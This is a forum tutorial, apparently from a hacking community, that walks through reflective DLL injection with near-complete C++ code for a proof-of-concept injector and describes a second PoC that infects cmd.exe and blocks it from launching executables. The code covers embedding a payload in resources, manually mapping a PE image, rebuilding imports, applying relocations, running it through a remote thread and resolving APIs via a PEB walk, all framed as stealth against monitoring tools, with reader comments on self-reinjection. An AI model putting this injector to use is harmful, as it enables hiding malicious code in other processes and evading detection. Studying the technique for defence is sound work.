Reflective DLL Injection

It’s been a while since I wrote something related to my development projects, not to mention something that’s malware-related. This was a concept that I devised (even though it already exists) while I was helping @fraq come up with ideas on stealth techniques on Windows machines. I’ve now completed a bare minimum proof-of-concept, dubbed Lynx, and will proceed to present its inner workings at the code level and then demonstrate it. To keep this article short and on topic, I will not be going over the details which will be mentioned in the pre-requisite list.

Disclaimer

The content provided is based entirely off my own research so if there is any incorrect information, I would like to sincerely apologise. If there is any feedback, please inform me and I will get to it as soon as I am able.

Author Assigned Level: -

Community Assigned Level:

  • Newbie
  • Wannabe
  • Hacker
  • Wizard
  • Guru

0 voters

Required Skills

To completely understand the content of this article, the following lists pre-requisite knowledge:

  • C/C++
  • Windows API
  • Virtual memory
  • PE file format
  • Dynamic-link Libraries

DLL Injection

What is DLL injection? DLL injection simply refers to the (forced) injection of a DLL into the space of another process and then execution of its code. The usual technique of performing this can represented by the following snippet of code:

VOID InjectDll(HANDLE hProcess, LPCSTR lpszDllPath) {
	LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	WriteProcessMemory(hProcess, lpBaseAddress, lpszDllPath, dwDllPathLen, &dwWritten);

	HMODULE hModule = GetModuleHandle("kernel32.dll");

	LPVOID lpStartAddress = GetProcAddress(hModule, "LoadLibraryA");

	CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, NULL);
}

The first step is to allocate an area of memory in the virtual memory space of the target process which can be done with the VirtualAllocEx function, specifying the handle to the process. We can then use WriteProcessMemory to write data to the process by using the full path to the DLL payload. To execute the code, all we are required to do is to retrieve the LoadLibrary function from the kernel32 module and then call CreateRemoteThread to execute the LoadLibrary function within the target process to force load the DLL payload as a library. As a result of this loading, it will immediately execute the DLL’s DllMain entry point with the DLL_PROCESS_ATTACH reason.

Here is the example DLL code that I will be using for the demonstration to represent malicious code:

#include <Windows.h>

BOOL APIENTRY DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpReserved) {
	::MessageBox(NULL, L"Hello world!", L"Test DLL", MB_OK);

	return TRUE;
}

Reflective DLL Injection

What makes Reflective DLL Injection different? Recall the previous DLL injection code and that the source of the DLL is obtained via its full path on disk. Because of this, it is not considered a very stealthy approach and also has an external dependency which may be problematic should it ever be separated. These issues can be addressed by using Reflective DLL Injection which allows the sourcing of the DLL in the form of its raw data. To be able to inject the data into the target process, we must manually parse and map the binary into the virtual memory as the Windows image loader would do when calling the LoadLibrary function from before. So let’s find out how this can be done.


Reflective DLL Injection Process

Here is a brief summary of the stages that will be undergone to map a DLL into an external process:

  1. The DLL payload must be retrieved,
  2. The DLL must then be mapped into memory,
  3. After mapping it to memory, its import table must be rebuilt,
  4. The base relocation table must be parsed to fix addresses due to the potential difference in image base,
  5. The mapped DLL is then written into the target process.

Extracting From Resources

To keep the DLL together with the injector as a single entity, we can take advantage of the PE format’s resource section.

Extracting the DLL’s raw binary is a trivial task which can be performed by using the resource API. Before extracting, we must check if a DLL exists in the resources like so:

BOOL CALLBACK EnumResNameProc(HMODULE hModule, LPCWSTR lpszType, LPWSTR lpszName, LONG_PTR lParam) {
	HRSRC *h = reinterpret_cast<HRSRC *>(lParam);
	HRSRC hRsrc = ::FindResource(hModule, lpszName, lpszType);
	if (!hRsrc) return TRUE;
	// if found, stop enumerating
	else {
		*h = hRsrc;
		return FALSE;
	}

	return TRUE;
}

bool Injector::HasPayload() {
	// get own module
	HMODULE hModule = ::GetModuleHandle(NULL);
	if (!hModule) return false;

	// enumerate resources and select "PAYLOAD" type
	HRSRC hRsrc = NULL;
	if (!::EnumResourceNames(hModule, L"PAYLOAD", EnumResNameProc, reinterpret_cast<LPARAM>(&hRsrc)) && GetLastError() != ERROR_RESOURCE_ENUM_USER_STOP)
		return false;	// fail if no PAYLOAD resources are found

	if (!hRsrc) return false;

	this->payload->hResPayload = hRsrc;

	return true;
}

The above code will enumerate all of the resources of type PAYLOAD (there should only be one) and if it is successful, it will retrieve a handle to the resource by calling FindResource. Once we’ve obtained the handle, we can get a pointer to the raw binary data and copy it into memory using the following:

bool Injector::LoadFromResource() {
	// get resource size
	DWORD dwSize = ::SizeofResource(::GetModuleHandle(NULL), this->payload->hResPayload);
	// load resource
	HGLOBAL hResData = ::LoadResource(NULL, this->payload->hResPayload);
	if (hResData) {
		// get pointer to data
		LPVOID lpPayload = ::LockResource(hResData);
		if (lpPayload) {
			// save to vector
			if (MemoryMapPayload(lpPayload))
				return true;
		}
	}

	return false;
}

Keep in mind that after calling LockResource, the pointer to the DLL resource is read-only and the data is in its disk form, meaning that the offsets are all file offsets, not memory offsets.

Mapping to Memory

We will need to convert it into its memory form for further processing which we can do by parsing its structures and mapping it to a memory space. The following code will achieve this:

bool Injector::MemoryMapPayload(LPVOID lpPayload) {
	// get DOS header
	PIMAGE_DOS_HEADER pidh = reinterpret_cast<PIMAGE_DOS_HEADER>(lpPayload);
	// get NT headers
	PIMAGE_NT_HEADERS pinh = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<DWORD>(lpPayload) + pidh->e_lfanew);

    // get handle to mapping
	HANDLE hMapping = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, pinh->OptionalHeader.SizeOfImage, NULL);
	if (hMapping) {
        // get a pointer to the mapped address
		LPVOID lpMapping = ::MapViewOfFile(hMapping, FILE_MAP_WRITE, 0, 0, 0);
		if (lpMapping) {
			// map payload to memory
			// copy headers
			::CopyMemory(lpMapping, lpPayload, pinh->OptionalHeader.SizeOfHeaders);
			// copy sections
			for (int i = 0; i < pinh->FileHeader.NumberOfSections; i++) {
				PIMAGE_SECTION_HEADER pish = reinterpret_cast<PIMAGE_SECTION_HEADER>(reinterpret_cast<DWORD>(lpPayload) + pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i);
				::CopyMemory(reinterpret_cast<LPVOID>(reinterpret_cast<DWORD>(lpMapping) + pish->VirtualAddress), reinterpret_cast<LPVOID>(reinterpret_cast<DWORD>(lpPayload) + pish->PointerToRawData), pish->SizeOfRawData);
			}
			this->vPayloadData = std::vector<BYTE>(reinterpret_cast<LPBYTE>(lpMapping), reinterpret_cast<LPBYTE>(lpMapping) + pinh->OptionalHeader.SizeOfImage);
			::UnmapViewOfFile(lpMapping);
			::CloseHandle(hMapping);
			return true;
		}
		::CloseHandle(hMapping);
	}

	return false;
}

Here, a segment of memory is mapped so that we can transform the binary into its memory-mapped counterpart. The sections are first copied into memory as they are the same as a disk object and a memory image. Next, the section headers are enumerated to gather the virtual offsets of the sections themselves which is used to correctly insert the sections into their correct regions. Once the transformation is complete, we can simply store it and clean up the mapped memory.

Rebuilding and Injecting the DLL

Before we rebuild the DLL, we must first check if the target process exists, and if it does, retrieve the handle to it. We can do this by enumerating all of the running processes and then comparing their names:

bool Injector::GetProcess() {
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(hSnapshot, &pe32)) {
		while (Process32Next(hSnapshot, &pe32)) {
            // check process name
			if (wcsicmp(pe32.szExeFile, this->szProcessName.c_str()) == 0) {
				// get handle to process
				HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
				::CloseHandle(hSnapshot);
                // save handle
				this->payload->hProcess = hProcess;
				return true;
			}
		}
	} else
		return ::CloseHandle(hSnapshot), false;

	return false;
}

We are now able to check if we can allocate some memory in the target process’s address space. To achieve this, we can use the VirtualAllocEx function, specifying the handle to the process and the size of the image:

	// allocate space in target process
	this->payload->lpAddress = ::VirtualAllocEx(this->payload->hProcess, NULL, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!this->payload->lpAddress)
		return Debug(L"Failed to allocate space: %lu\n", GetLastError()), false;

Once we’ve confirmed that there is available space, we can move onto rebuilding the DLL. Firstly, rebuilding the import table:

bool Injector::RebuildImportTable(LPVOID lpBaseAddress, PIMAGE_NT_HEADERS pinh) {
	// parse import table if size != 0
	if (pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) {
		// https://stackoverflow.com/questions/34086866/loading-an-executable-into-current-processs-memory-then-executing-it
		PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(reinterpret_cast<DWORD>(lpBaseAddress) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

		// Walk until you reached an empty IMAGE_IMPORT_DESCRIPTOR
		while (pImportDescriptor->Name != NULL) {
			// get the name of each DLL
			LPSTR lpLibrary = reinterpret_cast<PCHAR>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->Name);

			HMODULE hLibModule = ::LoadLibraryA(lpLibrary);

			PIMAGE_THUNK_DATA nameRef = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->Characteristics);
			PIMAGE_THUNK_DATA symbolRef = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->FirstThunk);
			PIMAGE_THUNK_DATA lpThunk = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->FirstThunk);
			for (; nameRef->u1.AddressOfData; nameRef++, symbolRef++, lpThunk++) {
				// fix addresses
				// check if import by ordinal
				if (nameRef->u1.AddressOfData & IMAGE_ORDINAL_FLAG)
					*(FARPROC *)lpThunk = ::GetProcAddress(hLibModule, MAKEINTRESOURCEA(nameRef->u1.AddressOfData));
				else {
					PIMAGE_IMPORT_BY_NAME thunkData = reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(reinterpret_cast<DWORD>(lpBaseAddress) + nameRef->u1.AddressOfData);
					*(FARPROC *)lpThunk = ::GetProcAddress(hLibModule, reinterpret_cast<LPCSTR>(&thunkData->Name));
				}
			}
			::FreeLibrary(hLibModule);
			// advance to next IMAGE_IMPORT_DESCRIPTOR
			pImportDescriptor++;
		}
	}

	return true;
}

Basically, the import table is obtained via the Optional Header structure of the PE format and it is walked, retrieving the imported function names and then overwriting the FirstThunk addresses. This is done by first getting the library containing the function using LoadLibrary and then calling GetProcAddress to get the proper address.

The next step is to relocate the address using the Relocation Table. The delta of the actual allocated base address in the target process in conjunction with the original base address is calculated with a simple subtraction:

DWORD dwDelta = reinterpret_cast<DWORD>(this->payload->lpAddress) - pinh->OptionalHeader.ImageBase;

Similar to the import table, the data in the relocation table is walked and applies the appropriate offset to the provided addresses using the calculated delta:

bool Injector::BaseRelocate(LPVOID lpBaseAddress, PIMAGE_NT_HEADERS pinh, DWORD dwDelta) {
	IMAGE_BASE_RELOCATION *r = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD>(lpBaseAddress) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); //The address of the first I_B_R struct 
	IMAGE_BASE_RELOCATION *r_end = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD_PTR>(r) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size - sizeof(IMAGE_BASE_RELOCATION)); //The addr of the last
	for (; r < r_end; r = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD_PTR>(r) + r->SizeOfBlock)) {
		WORD *reloc_item = reinterpret_cast<WORD *>(r + 1);
		DWORD num_items = (r->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);

		for (DWORD i = 0; i < num_items; ++i, ++reloc_item) {
			switch (*reloc_item >> 12) {
				case IMAGE_REL_BASED_ABSOLUTE:
					break;
				case IMAGE_REL_BASED_HIGHLOW:
					*(DWORD_PTR *)(reinterpret_cast<DWORD>(lpBaseAddress) + r->VirtualAddress + (*reloc_item & 0xFFF)) += dwDelta;
					break;
				default:
					return false;
			}
		}
	}

	return true;
}

Now that we’ve rebuilt what needs to be rebuilt and have allocated memory in the external process, we can just simply write the entire binary in using WriteProcessMemory:

if (!::WriteProcessMemory(this->payload->hProcess, this->payload->lpAddress, this->vPayloadData.data(), pinh->OptionalHeader.SizeOfImage, NULL))
		return Debug(L"Failed write payload: %lu\n", GetLastError()), false;

Easy, right?

Executing the DLL

Execution is almost the same as normal DLL injection, using a call to CreateRemoteThread. The only difference here is that we will not be using LoadLibrary but instead, we will use the address of entry point value directly of the DLL which should be the DllMain entry point.

// entry point is the base address + the AddressOfEntryPoint value
this->payload->dwEntryPoint = reinterpret_cast<DWORD>(this->payload->lpAddress) + pinh->OptionalHeader.AddressOfEntryPoint;

HANDLE hThread = ::CreateRemoteThread(this->payload->hProcess, NULL, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(payload->dwEntryPoint), NULL, 0, NULL);

And that’s it!


Demonstration

In this demonstration, I will be using putty.exe because I can and I can’t use explorer.exe because it is a 64-bit process versus my 32-bit injector and DLL. Also, I don’t have a 32-bit VM anywhere. I will also be using the Process Hacker monitoring tool to view any forensic evidence as a result of the DLL injection.

Normal DLL Injection

Here is the result of the normal DLL injection method:

We can see that it shows up clearly on the list of loaded modules and is a very obvious giveaway that there is foreign code in the affected process.

Reflective DLL Injection

Let’s now check out the reflective DLL injection method:

And here, there is no name for that block of memory space. Besides the RWX permissions (which can easily be fixed but remember that this is a PoC), there are no obvious signs that there exists any foreign code! Pretty neat, huh?


Addressing Some Issues

Just a little addition to the article, there are problems which may be encountered when executing in the space of another process. While this example DLL may work on many processes, it will only be guaranteed to work on those which have imported the user32.dll library as the (only) function it uses MessageBox. Many GUI applications on Windows import user32.dll as a requirement to be able to create part of the graphical components.

Instead of using the example DLL, say, we wanted to use something more complex that depends on multiple libraries which may or may not be imported by the target process, for example, a console application. In such an event, execution of the non-existent function (within the space of the target process) will cause some access violation error with a very likely chance as it could be attempting to execute non-executable memory. The process will inevitably crash. So how could we solve this issue?

Dynamically Retrieving Functions

One of the solutions is to obtain the API before executing the main payload which can be done by using the classic LoadLibrary and GetProcAddress combination to load libraries into the process space and then getting the addresses of a desired functions. I will quickly explain it because I’ve already detailed it in another thread. Essentially, we find the image base of the kernel32.dll module which is always loaded in every process due to some crucial functions required to initialise the program. Once a handle has been gained, the export table is found and then walked where each name of every exported function is compared which when a needed function is found, so can the address of the function, i.e. LoadLibrary and GetProcAddress. With these two function addresses present, it is possible to then load more libraries into the process and find the addresses of any desired function that exists in the WinAPI. Let’s see how this is done.

void InitialiseFunctions(void) {
	HMODULE hKernel32Mod = NULL;
	__asm {
		pushad
		mov		eax, fs:[0x30]
		mov		eax, [eax + 0x0C]
		mov		eax, [eax + 0x14]
		mov		eax, [eax]
		mov		eax, [eax]
		mov		eax, [eax + 0x10]
		mov		hKernel32Mod, eax
		popad
	}

	// get DOS header
	PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)(hKernel32Mod);
	// get NT headers
	PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)((DWORD)hKernel32Mod + pidh->e_lfanew);
	// find eat
	PIMAGE_EXPORT_DIRECTORY pied = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hKernel32Mod + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	// find functions
	LPDWORD dwAddresses = (LPDWORD)((DWORD)hKernel32Mod + pied->AddressOfFunctions);
	LPDWORD dwNames = (LPDWORD)((DWORD)hKernel32Mod + pied->AddressOfNames);
	LPWORD wOrdinals = (LPWORD)((DWORD)hKernel32Mod + pied->AddressOfNameOrdinals);

	// loop through all names of functions and select LoadLibrary and GetProcAddress
	for (int i = 0; i < pied->NumberOfNames; i++) {
		LPCSTR lpName = (LPCSTR)((DWORD)hKernel32Mod + dwNames[i]);
		if (!strcmp(lpName, "LoadLibraryA"))
			fnLoadLibraryA = (pfnLoadLibraryA)((DWORD)hKernel32Mod + dwAddresses[wOrdinals[i]]);
		else if (!strcmp(lpName, "GetProcAddress"))
			fnGetProcAddress = (pfnGetProcAddress)((DWORD)hKernel32Mod + dwAddresses[wOrdinals[i]]);
	}

	// load libraries
	HMODULE hUser32Mod = fnLoadLibraryA("user32.dll");
	HMODULE hShlwapiMod = fnLoadLibraryA("shlwapi.dll");

	// kernel32
	// functions to reinfect another process
	fnCreateToolhelp32Snapshot = (pfnCreateToolhelp32Snapshot)fnGetProcAddress(hKernel32Mod, "CreateToolhelp32Snapshot");
	fnProcess32FirstW = (pfnProcess32FirstW)fnGetProcAddress(hKernel32Mod, "Process32FirstW");
	fnProcess32NextW = (pfnProcess32NextW)fnGetProcAddress(hKernel32Mod, "Process32NextW");
	fnOpenProcess = (pfnOpenProcess)fnGetProcAddress(hKernel32Mod, "OpenProcess");
	fnCloseHandle = (pfnCloseHandle)fnGetProcAddress(hKernel32Mod, "CloseHandle");
	fnIsWow64Process = (pfnIsWow64Process)fnGetProcAddress(hKernel32Mod, "IsWow64Process");
	fnGetProcessHeap = (pfnGetProcessHeap)fnGetProcAddress(hKernel32Mod, "GetProcessHeap");
	fnHeapAlloc = (pfnHeapAlloc)fnGetProcAddress(hKernel32Mod, "HeapAlloc");
	fnGetModuleFileNameW = (pfnGetModuleFileNameW)fnGetProcAddress(hKernel32Mod, "GetModuleFileNameW");
	fnVirtualAllocEx = (pfnVirtualAllocEx)fnGetProcAddress(hKernel32Mod, "VirtualAllocEx");
	fnWriteProcessMemory = (pfnWriteProcessMemory)fnGetProcAddress(hKernel32Mod, "WriteProcessMemory");
	fnCreateRemoteThread = (pfnCreateRemoteThread)fnGetProcAddress(hKernel32Mod, "CreateRemoteThread");
	fnHeapFree = (pfnHeapFree)fnGetProcAddress(hKernel32Mod, "HeapFree");
	fnGetLastError = (pfnGetLastError)fnGetProcAddress(hKernel32Mod, "fnGetLastError");
	fnExitProcess = (pfnExitProcess)fnGetProcAddress(hKernel32Mod, "ExitProcess");
	fnGetNativeSystemInfo = (pfnGetNativeSystemInfo)fnGetProcAddress(hKernel32Mod, "GetNativeSystemInfo");
	// functions for payload
	fnWaitForSingleObject = (pfnWaitForSingleObject)fnGetProcAddress(hKernel32Mod, "WaitForSingleObject");
	fnGetModuleHandleW = (pfnGetModuleHandleW)fnGetProcAddress(hKernel32Mod, "GetModuleHandleW");
	fnCreateProcessW = (pfnCreateProcessW)fnGetProcAddress(hKernel32Mod, "CreateProcessW");

	// shwlapi
	fnStrStrIW = (pfnStrStrIW)fnGetProcAddress(hShlwapiMod, "StrStrIW");

	// user32
	// debugging functions
#ifdef _DEBUG
	fnwvsprintfW = (pfnwvsprintfW)fnGetProcAddress(hUser32Mod, "wvsprintfW");
	fnMessageBoxW = (pfnMessageBoxW)fnGetProcAddress(hUser32Mod, "MessageBoxW");
#endif // _DEBUG

}

The inline assembly at the start represents the procedure to get the image base of the kernel32.dll library. It finds the PEB of the process, then iterates through a list of memory modules until it hits the second one. Note that this will always be in the same order as it is called the InMemoryOrderModuleList member, starting with ntdll.dll first, then kernel32.dll, then the main process itself. The DllBase member is at a 0x10 offset from the beginning of the data structure defined by the entry:

typedef struct _LDR_DATA_TABLE_ENTRY {
    // unnecessary members omitted
    LIST_ENTRY InMemoryOrderLinks;    // offset 0; size 8
    PVOID Reserved2[2];               // offset 8; size 8
    PVOID DllBase;                    // offset 16
    // unnecessary members omitted
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

After this, the export table address is found and pointed to by pied which is then used to find the pointer to the addresses which hold the names, ordinals and function addresses. We can use a loop to iterate through all the functions (they are in alphabetical order) to match and retrieve LoadLibrary and GetProcAddress. These two functions are then used to load the required libraries and their functions.

Now we can execute the payload.

Demonstration

The following demonstration shows another PoC program which I named Phage which is an executable that uses the reflective DLL injection style method to infect another process (hence does not rely on a DLL). Here I have chosen to infect cmd.exe under 32-bit Windows 7 (to prove the functioning dynamically-retrieved API) and disable a particular feature.

Let’s look at the process’s initial memory space and what libraries are present by default:

and then here it is infected:

Firstly, Phage has placed itself in the memory address 0x1580000. We can also see at the bottom of the list of stacked DLLs there is the loaded Shlwapi.dll library which was defined in the above code. The imported function StrStrIW is used in the payload to filter out certain parameters under a feature which I have impaired as seen here:

Whenever the infected process tries to start a process which has a .exe in its name, it will be denied.


Conclusion

Reflective DLL injection is just the emulation of the Windows image loader to map and execute a DLL into another process’s address space which can remain hidden due to the lack of obvious information provided by monitoring tools.

LoadLibrary versus manual injection? They both have their advantages and disadvantages. For example, LoadLibrary provides a much more elegant injection that properly executes the DllMain entry point with the correct arguments. On the other hand, I’ve no idea how it would be possible using what I did which means that it may not be possible to utilise the fdwReason parameter to properly execute code under certain circumstances and hence, may fire off code multiple times undesirably. There might be a way to do it but I do not know of it.

As I’ve stated previously, the code is bare minimum working and there may be a lot more things I’d need to add to support DLLs with slightly different structures. I’ve also opted to create a GUI for it too but further development of the code might not be considered for the time being. I will upload it to my Gitlab here!

Thanks for reading and I hope you’ve learned something!

dtm

20 Likes

How would you go about letting the DLL inject itself, without the need for a separate injector? Sorta like meterpreter. Can the DLL read it’s process’ memory and copy itself from there?

1 Like

A DLL is a library, not a standalone executable so you cannot execute it like normal. If I’m correct, there is a potential way to do this which is basically injecting the executable’s memory itself. Of course, this would mean that the DLL code would be part of the main injector at the source level or in some form of shellcode. Once injected, you will have to locate the entry point to start remote thread execution which can just be AddressOfEntryPoint but that would require you to define some code which is able to recognise if it is running under another process’s context or not so that it knows which execution path to follow. Or you could define an exported function which removes the need to check the state.

If you like the challenge, I’ll leave this up to you. Otherwise, I will allocate some time at a later date to create a PoC. But I’m sure you can do it! :wink:

I worded that badly. What I meant is, after the DLL is already injected into some process and running. How can the DLL find itself in the injectee’s memory, read itself and perform reflective injection on another process? Mostly curious about the finding part.

There is a parameter argument in CreateRemoteThread that you can use to pass the injected DLL’s module base to the DLL. Using that, it can find its own memory region to reinject itself.

EDIT: I’ve modified my TestDLL file to take in the image base as a parameter and here is what it looks like in action:

3 Likes

Hello, I’m newbie at reversing and hacking, i have questions.
Why do you rebuild import table in injector’s address?
I think there are two problems,

First, some dlls are not loaded in target process.
Second, some dlls(maybe not system dll but something like directx or other public dll) are not loaded at same imagebase in target’s address.

Both can be solved by your ‘InitialiseFunctions’ function, which means you have to rebuild IAT
after writing dll into target process even you already did rebuilding IAT.
So why do you rebuild in injector’s address?

By the way, I think this way is manual mapping not reflective dll injection.
Reflective dll injection means dll in target process load itself in target address space.
But in this article, injector load(make image form, relocation, iat stuffs) dll in its own memory and simply write on target process.

Another question is if additional dlls are loaded in target’s process by using loadlibrary, then this is too easy to get detected?? I mean normal file wouldn’t load that dlls.
So even if i inject my dll by using reflective injection, eventually i have to load 3rd dlls with loadlibrary.

is there any way to improve this?

Hello there! We’re all noobs at hacking here all looking to learn so I’ll try to answer your questions to the best of my ability.

The reason I chose to rebuild the import table there is because it is much simpler compared to constantly having to use ReadProcessMemory to query the import table and then use WriteProcessMemory to fix the addresses.

Yes, I can understand that some DLLs may not be loaded into the target process however, since this is a basic implementation designed purely to show an example, it was not included here. If you wish to have these features, you will need to create them yourself.

The rest of the issues you discuss in your post can be remedied using another approach which is to first inject a bootstrap-style shellcode into the target process along with the payload. This will then perform the initialisation similar to what has been demonstrated here. If you’re keen on developing this, we would love to see it posted here. :wink:

2 Likes

Thx for the reply.:slightly_smiling_face: